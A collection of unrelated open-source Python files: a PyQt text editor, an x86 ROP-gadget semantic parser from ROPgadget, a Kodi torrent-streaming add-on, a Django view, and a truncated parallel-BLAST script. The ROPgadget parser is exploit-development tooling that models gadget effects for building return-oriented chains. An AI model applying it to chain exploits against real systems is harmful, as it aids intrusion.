        self.actionSaveAs = QtGui.QAction(MainWindow)
        self.actionSaveAs.setObjectName(_fromUtf8("actionSaveAs"))
        self.actionExit = QtGui.QAction(MainWindow)
        self.actionExit.setObjectName(_fromUtf8("actionExit"))
        self.actionAbout = QtGui.QAction(MainWindow)
        self.actionAbout.setObjectName(_fromUtf8("actionAbout"))
        self.menuFile.addAction(self.actionNew)
        self.menuFile.addAction(self.actionOpen)
        self.menuFile.addAction(self.actionSave)
        self.menuFile.addAction(self.actionSaveAs)
        self.menuFile.addSeparator()
        self.menuFile.addAction(self.actionExit)
        self.menuHelp.addAction(self.actionAbout)
        self.menubar.addAction(self.menuFile.menuAction())
        self.menubar.addAction(self.menuHelp.menuAction())
        self.actionExit.triggered.connect(self.exitt)
        self.actionSave.triggered.connect(self.kaydet)
        self.actionSaveAs.triggered.connect(self.fkaydet)
        self.actionOpen.triggered.connect(self.ac)
        self.actionAbout.triggered.connect(self.hakkinda)
        self.actionNew.triggered.connect(self.yeni)
        self.retranslateUi(MainWindow)
        QtCore.QMetaObject.connectSlotsByName(MainWindow)

    def hakkinda(self):
        """Show the About dialog."""
        QtGui.QMessageBox.about(None, "About", "Ege Öz 2014")

    def yeni(self):
        """New: clear the edit buffer."""
        self.textEdit.clear()

    def ac(self):
        """Open: pick a file and load its contents into the editor."""
        filename = QtGui.QFileDialog.getOpenFileName(None, "Open File", "", os.getenv("USER"))
        if not filename:
            return  # dialog cancelled -- the old code crashed opening ""
        self.afilename = filename
        # "with" guarantees the handle is closed even if reading fails.
        with open(self.afilename, "r") as f:
            self.textEdit.setText(f.read())
        self.statusbar.showMessage("File opened.")

    def kaydet(self):
        """Save: write to the current file, or fall back to Save As."""
        if not self.afilename:
            # Nothing opened/saved yet -- the old code raised
            # AttributeError here; behave like Save As instead.
            self.fkaydet()
            return
        with open(self.afilename, "w") as f:
            f.write(self.textEdit.toPlainText())
        self.statusbar.showMessage("File saved.")

    def fkaydet(self):
        """Save As: pick a new file name and write the buffer to it."""
        filename = QtGui.QFileDialog.getSaveFileName(None, "Save File", "", os.getenv("USER"))
        if not filename:
            return  # dialog cancelled
        with open(filename, "w") as f:
            f.write(self.textEdit.toPlainText())
        # Remember the chosen name so a later plain Save writes here too.
        self.afilename = filename
        self.statusbar.showMessage("File saved.")

    def exitt(self):
        """Exit the application."""
        sys.exit()

    def retranslateUi(self, MainWindow):
        """Install (translatable) user-visible strings on the widgets."""
        MainWindow.setWindowTitle(_translate("MainWindow", "TextPad", None))
        self.menuFile.setTitle(_translate("MainWindow", "File", None))
        self.menuHelp.setTitle(_translate("MainWindow", "Help", None))
        self.actionNew.setText(_translate("MainWindow", "New", None))
        self.actionOpen.setText(_translate("MainWindow", "Open", None))
        self.actionSave.setText(_translate("MainWindow", "Save", None))
        self.actionSaveAs.setText(_translate("MainWindow", "Save As", None))
        self.actionExit.setText(_translate("MainWindow", "Exit", None))
        self.actionAbout.setText(_translate("MainWindow", "About", None))
if __name__ == "__main__":
    # Standalone entry point: create the Qt application, build the main
    # window from the generated UI class, and run the event loop.
    import sys
    app = QtGui.QApplication(sys.argv)
    MainWindow = QtGui.QMainWindow()
    ui = Ui_MainWindow()
    ui.setupUi(MainWindow)
    MainWindow.show()
    sys.exit(app.exec_())
| egeoz/TextPad | textpad.py | Python | gpl-2.0 | 4,788 |
#!/usr/bin/env python2
##
## We define Instrution as two types "Computing instruction" and "Control Transfer instruction"
## for computing instruction
## "NAME" : [ Operand_Number , [ Formula_that_modify_reg ], [ FLAG_reg_modified]]
## for control transfter instruciton
## "NAME" : [ Operand_Number , [ Formula_that_modify_reg ], [ DST_Addr_on_condition]]
##
from capstone import *
from expression import Exp
from semantic import Semantic
from copy import deepcopy
class X86:
    """Static architecture tables for the x86/x86-64 gadget parser.

    ``insn`` maps each supported mnemonic to
    ``[operand_count, [register formulas], [extra]]`` where ``extra`` is the
    list of FLAG registers a computing instruction modifies, or the
    branch-target formulas of a control-transfer instruction.
    """
    # CPU status/control flags referenced by the formulas below.
    FLAG = ["CF", "PF", "AF", "ZF", "SF", "TF", "IF", "DF", "OF"]
    regs64 = ["rax", "rbx", "rcx", "rdx", "rsi", "rdi", "rbp", "rsp", "r8", "r9", "r10", "r11", "r12",
              "r13", "r14", "r15", "cs", "ds", "es", "fs", "gs", "ss"]
    regs32 = ["eax", "ebx", "ecx", "edx", "cs", "ds", "es", "fs", "gs", "ss", "esi", "edi", "ebp", "esp", "eip"]
    # Sub-register name -> [bit-extract formula, write-back formula, width in bits]
    # ("$ a : b" selects bits a..b, "#" concatenates bit strings).
    Tregs64 = {
        "eax" : ["rax $ 0 : 31", "rax = ( rax $ 32 : 63 ) # eax", 32],
        "ax" : ["rax $ 0 : 15", "rax = ( rax $ 16 : 63 ) # ax", 16],
        "ah" : ["rax $ 8 : 15", "rax = ( rax $ 16 : 63 ) # ah # ( rax $ 0 : 7 )", 8],
        "al" : ["rax $ 0 : 7", "rax = ( rax $ 8 : 63 ) # al", 8],
        "ebx" : ["rbx $ 0 : 31", "rbx = ( rbx $ 32 : 63 ) # ebx", 32],
        "bx" : ["rbx $ 0 : 15", "rbx = ( rbx $ 16 : 63 ) # bx", 16],
        "bh" : ["rbx $ 8 : 15", "rbx = ( rbx $ 16 : 63 ) # bh # ( rbx $ 0 : 7 )", 8],
        "bl" : ["rbx $ 0 : 7", "rbx = ( rbx $ 8 : 63 ) # bl", 8],
        "ecx" : ["rcx $ 0 : 31", "rcx = ( rcx $ 32 : 63 ) # ecx", 32],
        "cx" : ["rcx $ 0 : 15", "rcx = ( rcx $ 16 : 63 ) # cx", 16],
        "ch" : ["rcx $ 8 : 15", "rcx = ( rcx $ 16 : 63 ) # ch # ( rcx $ 0 : 7 )", 8],
        "cl" : ["rcx $ 0 : 7", "rcx = ( rcx $ 8 : 63 ) # cl", 8],
        "edx" : ["rdx $ 0 : 31", "rdx = ( rdx $ 32 : 63 ) # edx", 32],
        "dx" : ["rdx $ 0 : 15", "rdx = ( rdx $ 16 : 63 ) # dx", 16],
        "dh" : ["rdx $ 8 : 15", "rdx = ( rdx $ 16 : 63 ) # dh # ( rdx $ 0 : 7 )", 8],
        "dl" : ["rdx $ 0 : 7", "rdx = ( rdx $ 8 : 63 ) # dl", 8],
    }
    Tregs32 = {
        "ax" : ["eax $ 0 : 15", "eax = ( eax $ 16 : 31 ) # ax", 16],
        "ah" : ["eax $ 8 : 15", "eax = ( eax $ 16 : 31 ) # ah # ( eax $ 0 : 7 )", 8],
        "al" : ["eax $ 0 : 7", "eax = ( eax $ 8 : 31 ) # al", 8],
        "bx" : ["ebx $ 0 : 15", "ebx = ( ebx $ 16 : 31 ) # bx", 16],
        "bh" : ["ebx $ 8 : 15", "ebx = ( ebx $ 16 : 31 ) # bh # ( ebx $ 0 : 7 )", 8],
        "bl" : ["ebx $ 0 : 7", "ebx = ( ebx $ 8 : 31 ) # bl", 8],
        "cx" : ["ecx $ 0 : 15", "ecx = ( ecx $ 16 : 31 ) # cx", 16],
        "ch" : ["ecx $ 8 : 15", "ecx = ( ecx $ 16 : 31 ) # ch # ( ecx $ 0 : 7 )", 8],
        "cl" : ["ecx $ 0 : 7", "ecx = ( ecx $ 8 : 31 ) # cl", 8],
        "dx" : ["edx $ 0 : 15", "edx = ( edx $ 16 : 31 ) # dx", 16],
        "dh" : ["edx $ 8 : 15", "edx = ( edx $ 16 : 31 ) # dh # ( edx $ 0 : 7 )", 8],
        "dl" : ["edx $ 0 : 7", "edx = ( edx $ 8 : 31 ) # dl", 8],
    }
    # Instructions that modifty the execution path
    Control = ["ret", "iret", "int", "into", "enter", "leave", "call", "jmp", "ja", "jae", "jb", "jbe", "jc", "je","jnc", "jne", "jnp", "jp", "jg", "jge", "jl", "jle", "jno", "jns", "jo", "js"]
    # "ssp" below is a placeholder for the mode's stack pointer; it is
    # substituted with esp/rsp by ROPParserX86.__init__.
    insn = {
        # data transfer
        "mov": [2, ["operand1 = operand2"], []],
        "cmove": [2, ["operand1 = ( ZF == 1 ) ? operand2 : operand1"], []],
        "cmovne": [2, ["operand1 = ( ZF == 0 ) ? operand2 : operand1"], []],
        "cmova": [2, ["operand1 = ( ( ZF == 0 ) & ( CF == 0 ) ) ? operand2 : operand1"], []],
        "cmovae": [2, ["operand1 = ( CF == 0 ) ? operand2 : operand1"], []],
        "cmovb": [2, ["operand1 = ( CF == 1 ) ? operand2 : operand1"], []],
        "cmovbe": [2, ["operand1 = ( ( ZF == 1 ) | ( CF == 1 ) ) ? operand2 : operand1"], []],
        "cmovg": [2, ["operand1 = ( ( ZF == 0 ) & ( SF == OF ) ) ? operand2 : operand1"], []],
        "cmovge": [2, ["operand1 = ( SF == OF ) ? operand2 : operand1"], []],
        "cmovl": [2, ["operand1 = ( SF != OF ) ? operand2 : operand1"], []],
        "cmovle": [2, ["operand1 = ( ( ZF == 1 ) & ( SF != OF ) ) ? operand2 : operand1"], []],
        "cmovs": [2, ["operand1 = ( SF == 1 ) ? operand2 : operand1"], []],
        "cmovp": [2, ["operand1 = ( PF == 1 ) ? operand2 : operand1"], []],
        "push": [1, ["* ssp = operand1"], []],
        "pop": [1, ["operand1 = * ssp"], []],
        #"movsx": [2, ["operand1 = operand2 > 0 ? operand2 : operand2 & 0xffffffffffffffff"], []],
        #"movzx": [2, ["operand1 = 0 & operand2"], []],
        # flag control instuctions
        "stc": [0, [], ["CF = 1"]],
        "clc": [0, [], ["CF = 0"]],
        "cmc": [0, [], ["CF = ~ CF"]],
        "cld": [0, [], ["DF = 0"]],
        "std": [0, [], ["DF = 1"]],
        "sti": [0, [], ["IF = 1"]],
        "cli": [0, [], ["IF = 0"]],
        # arithmetic
        "xchg": [2, ["FIXME"], []],
        "cmp": [2, ["temp = operand1 - operand2"], ["CF", "OF", "SF", "ZF", "AF", "PF"]],
        "add": [2, ["operand1 = operand1 + operand2"], ["OF", "SF", "ZF", "AF", "CF", "PF"]],
        "adc": [2, ["operand1 = operand1 + operand2 + CF"], ["OF", "SF", "ZF", "AF", "CF", "PF"]],
        "sub": [2, ["operand1 = operand1 - operand2"], ["OF", "SF", "ZF", "AF", "CF", "PF"]],
        "sbb": [2, ["operand1 = operand1 - operand2 - CF"], ["OF", "SF", "ZF", "AF", "CF", "PF"]],
        "inc": [1, ["operand1 = operand1 + 1"], ["OF", "SF", "ZF", "AF", "PF"]],
        "dec": [1, ["operand1 = operand1 - 1"], ["OF", "SF", "ZF", "AF", "PF"]],
        "neg": [1, ["operand1 = - operand1"], ["CF", "OF", "SF", "ZF", "AF", "PF"]],
        # control transfer
        "ret": [1, [], ["* ssp"]],
        "call": [1, [], ["* operand1"]],
        "jmp": [1, [], ["* operand1"]],
        "ja": [1, [], ["( ( CF == 0 ) & ( ZF == 0 ) ) ? * operand1 : 0"]],
        "jae": [1, [], ["CF == 0 ? * operand1 : 0"]],
        "jb": [1, [] , ["CF == 1 ? * operand1 : 0"]],
        "jbe": [1, [] , ["( ( CF == 1 ) | ( ZF == 1 ) ) ? * operand1 : 0"]],
        "jc": [1, [], ["CF == 1 ? * operand1 : 0"]],
        "je": [1, [], ["ZF == 1 ? * operand1 : 0"]],
        "jnc": [1, [], ["CF == 0 ? * operand1 : 0"]],
        "jne": [1, [], ["ZF == 0 ? * operand1 : 0"]],
        "jnp": [1, [], ["PF == 0 ? * operand1 : 0"]],
        "jp": [1, [], ["PF == 1 ? * operand1 : 0"]],
        "jg": [1, [], ["( ( ZF == 0 ) & ( SF == OF ) ) ? * operand1 : 0"]],
        "jge": [1, [], ["SF == OF ? * operand1 : 0"]],
        "jl": [1, [], ["SF != OF ? * operand1 : 0"]],
        "jle": [1, [], ["( ( ZF == 1 ) | ( SF != OF ) ) ? * operand1 : 0"]],
        "jno": [1, [], ["OF == 0 ? * operand1 : 0"]],
        "jns": [1, [], ["SF == 0 ? * operand1 : 0"]],
        "jo": [1, [], ["OF == 1 ? * operand1 : 0"]],
        "js": [1, [], ["SF == 1 ? * operand1 : 0"]],
        # logic
        "and": [2, ["operand1 = operand1 & operand2"], ["CF = 0", "OF = 0", "SF", "ZF", "PF"]],
        "or": [2, ["operand1 = operand1 | operand2"], ["CF = 0", "OF = 0", "SF", "ZF", "PF"]],
        "xor": [2, ["operand1 = operand1 ^ operand2"], ["CF = 0","OF = 0", "SF", "ZF", "PF"]],
        "not": [1, ["operand1 = ~ operand1"], []],
        "test": [2, ["temp = operand1 & operand2"], ["OF = 0", "CF = 0", "SF", "ZF", "PF"]],
        # segment
        # others
        "lea": [2, ["operand1 = & operand2"], []],
        "nop": [0, [], []]
    }
class ROPParserX86:
    """Symbolically executes each gadget's instruction list and produces
    per-gadget register/memory formulas (Semantic objects)."""
    def __init__(self, gadgets, mode):
        # gadgets: list of {"insns": [...], "vaddr": ...} dicts (see parse()).
        # mode: capstone CS_MODE_32 or CS_MODE_64.
        self.gadgets = gadgets
        self.addrs = dict()
        self.mode = mode
        self.aligned = 0
        self.memLoc = []
        self.writeMem = {}
        if mode == CS_MODE_32:
            self.regs = X86.regs32 + X86.FLAG
            self.Tregs = X86.Tregs32
            self.aligned = 4
            self.default = 32
            self.sp = "esp"
            self.ip = "eip"
        else:
            self.regs = X86.regs64 + X86.FLAG
            self.Tregs = X86.Tregs64
            self.aligned = 8
            self.default = 64
            self.sp = "rsp"
            self.ip = "rip"
        # Specialise the generic "ssp" placeholder in the instruction tables
        # to this mode's stack pointer. NOTE: this mutates X86.insn in place,
        # so parsers of different modes must not be mixed in one process.
        for k, v in X86.insn.items():
            for i, s in enumerate(v[1]):
                v[1][i] = s.replace("ssp", self.sp)
            for i, s in enumerate(v[2]):
                v[2][i] = s.replace("ssp", self.sp)
            X86.insn.update({k:v})
    def parse(self):
        # Walk all gadgets; unparseable gadgets (unsupported instruction or
        # operand) are silently skipped. Returns a list of Semantic objects.
        formulas = []
        for gadget in self.gadgets:
            self.memLoc = []
            self.writeMem = {}
            # Start from a symbolic stack pointer only; other registers are
            # introduced lazily as the instructions reference them.
            regs = {self.sp : Exp(self.sp)}
            regs = self.parseInst(regs, gadget["insns"], 0)
            if len(regs) == 0:
                # gadget cannot parsed
                continue
            formulas.append(Semantic(regs, gadget["vaddr"], self.memLoc, self.writeMem))
            self.addrs.update({hex(gadget["vaddr"]).replace("L",""):gadget["insns"]})
        print "================================="
        print "Unique gadgets parsed ", len(formulas)
        return formulas
    def parseInst(self, regs, insts, i):
        # Recursively folds instruction i into the register-state dict
        # `regs`; an empty return value marks the gadget as unparseable.
        if i >= len(insts):
            return regs
        prefix = insts[i]["mnemonic"]
        op_str = insts[i]["op_str"].replace("*", " * ")
        if prefix not in X86.insn.keys():
            # unsupported ins
            return {}
        ins = X86.insn.get(prefix)
        if prefix in X86.Control:
            # control transfer ins, end of gadget
            if prefix in ["ret", "call"]:
                operand1 = None
                operand1 = Exp.parseOperand(op_str.split(", ")[0], regs, self.Tregs)
                dst = Exp.parseExp(ins[2][0].split())
                if operand1 is None:
                    dst = dst.binding({"operand1":Exp.ExpL(Exp.defaultLength,0)})
                else:
                    dst = dst.binding({"operand1":operand1})
                dst = dst.binding(regs)
                regs.update({self.ip : dst})
                # only ret inst modifies stackpointer
                if prefix == "ret":
                    ssp = regs[self.sp]
                    ssp = Exp(ssp, "+", Exp(self.aligned))
                    if operand1 is not None:
                        # "ret n" additionally pops n bytes of arguments.
                        ssp = Exp(ssp, "+", operand1)
                    regs.update({ self.sp :ssp})
                return regs
            # handle jmp
            operand1 = Exp.parseOperand(op_str.split(" ")[0], regs, self.Tregs)
            dst = Exp.parseExp(ins[2][0].split())
            dst = dst.binding({"operand1":operand1})
            dst = dst.binding(regs)
            regs.update({self.ip : dst})
            return regs
        else:
            # computing ins
            operand1 = None
            operand2 = None
            # Seed the operand environment with the stack pointer and any
            # flag values computed by earlier instructions.
            operands = {self.sp :regs[self.sp]}
            for flag in X86.FLAG:
                if flag in regs.keys():
                    operands.update({flag:regs[flag]})
            # handle special cases
            if ins[0] == 1:
                operand1 = Exp.parseOperand(op_str.split(", ")[0], regs, self.Tregs)
                if operand1 is None:
                    return []
                operands.update({"operand1":operand1})
            elif ins[0] == 2:
                operand1 = Exp.parseOperand(op_str.split(", ")[0], regs, self.Tregs)
                operand2 = Exp.parseOperand(op_str.split(", ")[1], regs, self.Tregs)
                if operand1 is None or operand2 is None:
                    return []
                operands.update({"operand1":operand1})
                operands.update({"operand2":operand2})
                # Track memory operands: destinations of non-read-only
                # instructions are recorded as writes as well.
                if prefix != "lea" and "ptr" in op_str and (operand1.getCategory() == 3 or operand2.getCategory() == 3):
                    if prefix not in ["cmp", "test", "push"] and "ptr" in op_str.split(", ")[0]:
                        self.memLoc.append(operand1)
                        self.writeMem.update({str(operand1):operand1})
                    else:
                        self.memLoc.append(operand1 if operand1.getCategory() == 3 else operand2)
            # contruct insn operation
            if len(ins[1]) > 0:
                if prefix == "lea":
                    # lea computes the effective address without a load.
                    reg = op_str.split(", ")[0]
                    addr = Exp.parseExp(op_str.split("[")[1][:-1].split())
                    addr = addr.binding(regs)
                    addr.length = Exp.defaultLength
                    regs.update({reg:addr})
                    return self.parseInst(regs, insts, i+1)
                if prefix == "xchg":
                    # xchg swaps the two operands; each side may be a full
                    # register, a sub-register (Tregs) or a memory location.
                    op1k = op_str.split(", ")[0]
                    op2k = op_str.split(", ")[1]
                    op1v = None
                    op2v = None
                    if op2k in self.Tregs:
                        # subpart of register
                        temp = Exp.parse(self.Tregs[op2k][1], {op2k:operands["operand1"]})
                        for k, v in temp.items():
                            v.length = Exp.defaultLength
                            op2k = k
                            op2v = v
                    elif op2k in self.regs:
                        # register
                        operands["operand1"].length = Exp.defaultLength
                        op2v = operands["operand1"]
                    else:
                        # mem
                        op2k = str(operands["operand2"])
                        op2v = operands["operand1"]
                    if op1k in self.Tregs:
                        temp = Exp.parse(self.Tregs[op1k][1], {op1k:operands["operand2"]})
                        for k, v in temp.items():
                            v.length = Exp.defaultLength
                            op1k = k
                            op1v = v
                    elif op1k in self.regs:
                        operands["operand2"].length = Exp.defaultLength
                        op1v = operands["operand2"]
                    else:
                        op1k = str(operands["operand1"])
                        op1v = operands["operand2"]
                    regs.update({op1k:op1v})
                    regs.update({op2k:op2v})
                    return self.parseInst(regs, insts, i+1)
                exps = Exp.parse(ins[1][0], operands)
                for reg, val in exps.items():
                    # handle special case of xor, op1 == op2 clear the register
                    if prefix == "xor" and op_str.split(", ")[0] == op_str.split(", ")[1]:
                        val = Exp.ExpL(val.length, 0)
                    # temp variable, no need to assign
                    if reg == "temp":
                        val.length = max(operand1.length, operand2.length)
                        continue
                    if "*" in reg:
                        # this can only be push inst
                        val.length = Exp.defaultLength
                        regs.update({"[ " + str(regs[self.sp]) + " ]":val})
                        continue
                    dst = Exp.parseOperand(op_str.split(", ")[0], {}, {})
                    if str(dst) in self.regs:
                        # general purpose reg
                        val.length = Exp.defaultLength
                        regs.update({str(dst):val})
                    elif str(dst) in self.Tregs:
                        # subpart of GPRs
                        temp = Exp.parse(self.Tregs[str(dst)][1], {})
                        for k, v in temp.items():
                            v = v.binding(regs)
                            v = v.binding({str(dst):val})
                            v.length = Exp.defaultLength
                            regs.update({k:v})
                    else:
                        # mem
                        regs.update({str(operands["operand1"]):val})
            # push/pop adjust the stack pointer after the data movement.
            if prefix == "push":
                regs.update({self.sp :Exp(regs[self.sp], "+", Exp(self.aligned))})
            if prefix == "pop":
                regs.update({self.sp :Exp(regs[self.sp], "-", Exp(self.aligned))})
            # evaluate flag regs base on exp
            if len(ins[2]) != 0:
                for flag in ins[2]:
                    tokens = flag.split()
                    if len(tokens) == 1:
                        # Bare flag name: value derives from the computed
                        # expression (e.g. "ZF" from the result of sub).
                        for k, v in exps.items():
                            exp = Exp(v, tokens[0][:-1])
                            exp.length = 1
                            regs.update({tokens[0]:exp})
                    else:
                        f = Exp.parse(flag, {})
                        for k,v in f.items():
                            # "CF = 1"
                            v.length = 1
                            regs.update({tokens[0]:v})
            return self.parseInst(regs, insts, i+1)
if __name__ == '__main__':
    # Smoke test: disassemble two hand-crafted gadget byte strings with
    # capstone and run them through the parser.
    binarys = [b"\x8d\x4c\x32\x08\x01\xd8\x81\xc6\x34\x12\x00\x00\xc3",
               b"\xbb\x01\x00\x00\x00\x29\xd8\x83\xf8\x01\x0f\x84\x0f\xf9\x01\x00\x5a\xc3"]
    gadgets = []
    md = Cs(CS_ARCH_X86, CS_MODE_32)
    md.detail = True
    for binary in binarys:
        insns = []
        for decode in md.disasm(binary, 0x1000):
            inst = {}
            inst.update({"mnemonic": decode.mnemonic})
            inst.update({"op_str": decode.op_str})
            inst.update({"vaddr": decode.address})
            insns.append(inst)
        # ROPParserX86.parse() indexes gadget["insns"] and gadget["vaddr"],
        # so each gadget must be a dict (passing the raw instruction list,
        # as before, raised "list indices must be integers").
        gadgets.append({"insns": insns, "vaddr": 0x1000})
    p = ROPParserX86(gadgets, CS_MODE_32)
    formulas = p.parse()
| XiaofanZhang/ROPgadget | ropgadget/ropparse/arch/parserx86.py | Python | gpl-2.0 | 17,183 |
# coding: utf-8
# Module: actions
# Created on: 27.07.2015
# Author: Roman Miroshnychenko aka Roman V.M. (romanvm@yandex.ua)
# Licence: GPL v.3: http://www.gnu.org/copyleft/gpl.html
import os
import xbmcgui
import xbmcplugin
from simpleplugin import Plugin
import json_requests as jsonrq
from buffering import buffer_torrent, stream_torrent, add_torrent, get_videofiles
plugin = Plugin()  # simpleplugin entry point for this add-on
_ = plugin.initialize_gettext()  # gettext shortcut for localized UI strings
# Directory holding the add-on's status/file-type icons
icons = os.path.join(plugin.path, 'resources', 'icons')
# Absolute path of the helper script invoked from context-menu RunScript() calls
commands = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'commands.py')
def _play(path):
    """
    Resolve a videofile path for Kodi playback.

    :param path: playable path; an empty/None path marks failure
    :return: plugin.resolve_url result with succeeded mirroring path truthiness
    """
    message = 'Path to play: {0}'.format(path)
    plugin.log_notice(message)
    succeeded = bool(path)
    return plugin.resolve_url(path, succeeded=succeeded)
@plugin.action()
def root():
    """
    Build the plugin's root menu: play, download and torrent list entries.
    """
    play_item = {'label': _('Play .torrent file...'),
                 'thumb': os.path.join(icons, 'play.png'),
                 'url': plugin.get_url(action='select_torrent', target='play')}
    download_item = {'label': _('Download torrent from .torrent file...'),
                     'thumb': os.path.join(icons, 'down.png'),
                     'url': plugin.get_url(action='select_torrent', target='download'),
                     'is_folder': False}
    torrents_item = {'label': _('Torrents'),
                     'thumb': plugin.icon,
                     'url': plugin.get_url(action='torrents')}
    return [play_item, download_item, torrents_item]
@plugin.action()
def select_torrent(params):
    """
    Let the user browse for a .torrent file, then play or download it.

    :param params: plugin call parameters; 'target' is 'play' or 'download'
    :return: file listing when playing, otherwise None
    """
    torrent = xbmcgui.Dialog().browse(1, _('Select .torrent file'), 'video', mask='.torrent')
    if not torrent:
        return
    plugin.log_notice('Torrent selected: {0}'.format(torrent))
    if params['target'] == 'play':
        return list_files({'torrent': torrent})
    download_torrent({'torrent': torrent})
@plugin.action('play')
def play_torrent(params):
    """
    Buffer a torrent and resolve it for playback.

    :param params: plugin call parameters with 'torrent' and optional 'file_index'
    :return: resolved playback URL
    """
    index = params.get('file_index')
    # 'dialog' (or absence) means "let buffering ask the user"; anything
    # else is a concrete numeric file index.
    if index not in (None, 'dialog'):
        index = int(index)
    return _play(buffer_torrent(params['torrent'], index))
@plugin.action()
def play_file(params):
    """
    Stream one file, addressed by index, from a torrent already in the session.

    :param params: plugin call parameters with 'file_index' and 'info_hash'
    :return: resolved playback URL
    """
    index = int(params['file_index'])
    return _play(stream_torrent(index, params['info_hash']))
@plugin.action('download')
def download_torrent(params):
    """
    Queue a torrent for background downloading and notify the user.

    :param params: plugin call parameters with 'torrent'
    """
    jsonrq.add_torrent(params['torrent'], False)
    message = _('Torrent added for downloading')
    xbmcgui.Dialog().notification('YATP', message, plugin.icon, 3000)
@plugin.action()
def torrents():
    """
    Yield list items for the torrents in the session, newest first.

    Each entry is coloured and iconed by its state and carries a context
    menu with pause/resume/delete/info commands.
    """
    # state -> (label colour, status icon); unknown states fall back to
    # blue/question mark.
    state_styles = {'downloading': ('red', 'down.png'),
                    'seeding': ('green', 'up.png'),
                    'paused': ('gray', 'pause.png')}
    torrent_list = sorted(jsonrq.get_all_torrent_info(),
                          key=lambda i: i['added_time'], reverse=True)
    for torrent in torrent_list:
        state = torrent['state']
        info_hash = torrent['info_hash']
        color, icon = state_styles.get(state, ('blue', 'question.png'))
        item = {'label': '[COLOR={0}]{1}[/COLOR]'.format(
                    color, torrent['name'].encode('utf-8')),
                'url': plugin.get_url(action='show_files', info_hash=info_hash),
                'is_folder': True,
                'thumb': os.path.join(icons, icon)}
        context_menu = [(_('Pause all torrents'),
                         'RunScript({commands},pause_all)'.format(commands=commands)),
                        (_('Resume all torrents'),
                         'RunScript({commands},resume_all)'.format(commands=commands)),
                        (_('Delete torrent'),
                         'RunScript({commands},delete,{info_hash})'.format(
                             commands=commands, info_hash=info_hash)),
                        (_('Delete torrent and files'),
                         'RunScript({commands},delete_with_files,{info_hash})'.format(
                             commands=commands, info_hash=info_hash)),
                        (_('Torrent info'),
                         'RunScript({commands},show_info,{info_hash})'.format(
                             commands=commands, info_hash=info_hash)),
                        ]
        # The pause/resume toggle goes first and depends on the state.
        if state == 'paused':
            toggle = (_('Resume torrent'),
                      'RunScript({commands},resume,{info_hash})'.format(
                          commands=commands, info_hash=info_hash))
        else:
            toggle = (_('Pause torrent'),
                      'RunScript({commands},pause,{info_hash})'.format(
                          commands=commands, info_hash=info_hash))
        context_menu.insert(0, toggle)
        if state == 'incomplete':
            context_menu.append((_('Complete download'),
                                 'RunScript({commands},restore_finished,{info_hash})'.format(
                                     commands=commands, info_hash=info_hash)))
        item['context_menu'] = context_menu
        yield item
def _build_file_list(files, info_hash):
    """
    Yield Kodi list items for the videofiles contained in a torrent.

    :param files: raw torrent file list; filtered through get_videofiles()
    :param info_hash: torrent info-hash used to address individual files
    :return: generator of list-item dicts
    """
    # Known container formats get a matching icon, anything else a play icon.
    ext_icons = {'.avi': 'avi.png',
                 '.mp4': 'mp4.png',
                 '.mkv': 'mkv.png',
                 '.mov': 'mov.png'}
    for file_ in get_videofiles(files):
        extension = os.path.splitext(file_[1].lower())[1]
        thumb = os.path.join(icons, ext_icons.get(extension, 'play.png'))
        yield {'label': '{name} [{size}{unit}]'.format(name=file_[1].encode('utf-8'),
                                                       size=file_[2] / 1048576,
                                                       unit=_('MB')),
               'thumb': thumb,
               'url': plugin.get_url(action='play_file',
                                     info_hash=info_hash,
                                     file_index=file_[0]),
               'is_playable': True,
               'info': {'video': {'size': file_[2]}},
               }
@plugin.action()
def list_files(params):
    """
    Add a torrent to the session and show the videofiles it contains.

    :param params: plugin call parameters with 'torrent'
    :return: Kodi listing; empty list when adding the torrent failed
    """
    torrent_data = add_torrent(params['torrent'])
    if torrent_data is None:
        xbmcgui.Dialog().notification(plugin.id, _('Playback cancelled.'), plugin.icon, 3000)
        return []
    listing = _build_file_list(torrent_data['files'], torrent_data['info_hash'])
    return plugin.create_listing(listing,
                                 cache_to_disk=True,
                                 sort_methods=(xbmcplugin.SORT_METHOD_LABEL,
                                               xbmcplugin.SORT_METHOD_SIZE))
@plugin.action()
def show_files(params):
    """
    Show the videofiles of a torrent already present in the session.

    :param params: plugin call parameters with 'info_hash'
    :return: Kodi listing
    """
    info_hash = params['info_hash']
    listing = _build_file_list(jsonrq.get_files(info_hash), info_hash)
    return plugin.create_listing(listing,
                                 cache_to_disk=True,
                                 sort_methods=(xbmcplugin.SORT_METHOD_LABEL,
                                               xbmcplugin.SORT_METHOD_SIZE))
| kreatorkodi/repository.torrentbr | plugin.video.yatp/libs/client/actions.py | Python | gpl-2.0 | 8,310 |
#-*- coding: utf-8 -*-
"""URL映射"""
from django.views.generic.base import View
from django.http import HttpResponse
from django.shortcuts import render
from jiaxiao.config import site_name, channels, theme
class URLDispatchView(View):
    """Map a page name from the URL onto the matching theme template."""

    def get(self, request, page_name=''):
        """Handle GET: render '<theme>/<page_name>.html' with site context.

        An empty page name falls back to the 'index' page.
        """
        name = page_name if page_name != '' else 'index'
        template_name = '%s/%s.html' % (theme, name)
        context = {
            'site_name': site_name,
            'channels': channels,
        }
        return render(request, template_name, context)
#!/usr/bin/env python
### cut a fasta query (arg1) in "nbPart" (arg3)
### subFasta files and launches a blast programm (arg4)
### vs the bank (arg2) for each subfasta and then
### concatenates the tab delimited blast results in
### one file. You can add any additional blastall option in the
### arg5 with quotes like this : "-e 0.001 -a 2 -W 5"
### example of execution :
### paraBlast.py query.fasta blastdb 10 tblastx "-e 0.001 -a 2 -W 5"
import string
import sys
import os
import subprocess
import tempfile
from Bio import SeqIO
from Bio.Seq import Seq
from Bio.SeqRecord import SeqRecord
from StringIO import StringIO
fastafile = sys.argv[1]
#fastafile = "/bank/fasta/Roth/E1.454.fasta"
bank = sys.argv[2]
#bank = "/bank/blastdb/E1"
nbPart=int(sys.argv[3])
#nbPart=int(5)
my_blast_prog = sys.argv[4]
#my_blast_prog = "tblastx"
blastOpt=sys.argv[5]
#blastOpt="-e 0.001 -a 2 -W 5"
my_blast_exe = "/usr/local/bin/blast/bin/blastall"
nbResidues=0
meanLen=0
nbSeqs=0
seqs=[]
#### reading the fasta file to cut
handle = open(fastafile)
for seq_record in SeqIO.parse(handle, "fasta"):
seqs.append(seq_record)
nbSeqs+=1
nbResidues+=len(seq_record.seq)
handle.close()
#### prints some infos about the input fasta file
meanLen=nbResidues/nbSeqs
print "sequences -- residues -- mean sequence length"
print nbSeqs,"--",nbResidues,"--", meanLen
#### creates a temp directory and
#### writes the divided-input fasta files into it
wDir= "/scratch/USERS/prestat"
